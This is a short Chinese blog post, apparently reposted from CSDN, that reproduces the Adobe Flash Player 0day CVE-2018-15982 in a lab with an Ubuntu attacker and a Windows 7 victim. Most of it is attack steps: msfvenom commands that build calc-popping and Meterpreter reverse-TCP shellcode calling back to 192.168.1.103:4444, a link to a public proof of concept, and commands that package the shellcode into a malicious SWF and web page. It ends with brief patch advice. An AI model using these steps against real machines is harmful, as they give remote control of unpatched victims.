CVE-2018-15982 Adobe Flash Player 0day漏洞复现

0x00 前言

当地时间12月5日,Adobe官方发布安全通告修复了两个漏洞,分别是Adobe Flash Player中的0day漏洞CVE-2018-15982和Adobe Flash Player installer中的高危漏洞CVE-2018-15983。

 

POC下载地址:https://github.com/B1eed/VulRec/blob/master/CVE-2018-15982

 

0x01 复现环境介绍

攻击机:Ubuntu 16.04 MetaSploit-FrameWork

受害机:Win7

 

0x02 Payload生成

生成弹计算器payload

msfvenom -p windows/exec cmd=calc.exe -f raw > 86.bin

msfvenom -p windows/x64/exec cmd=calc.exe -f raw > 64.bin

生成meterpreter反弹

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f raw > 86.bin

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f raw > 64.bin

生成一个32位平台的payload和一个64位的payload。

0x03 生成网页和视频

python CVE_2018_15982.py -i 86.bin -I 64.bin

或者自定义一个swf的文件名

python CVE_2018_15982.py -i 86.bin -I 64.bin -o exp.swf

 

0x04 将Payload放入WEB环境中

 

0x05 成功弹出计算器

 

0x06 解决方案

Adobe官方已经发布新版本修复了上述漏洞,用户应及时升级进行防护。

下载更新地址:https://get.adobe.com/flashplayer

发布了19 篇原创文章 · 获赞 12 · 访问量 3万+

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/86532740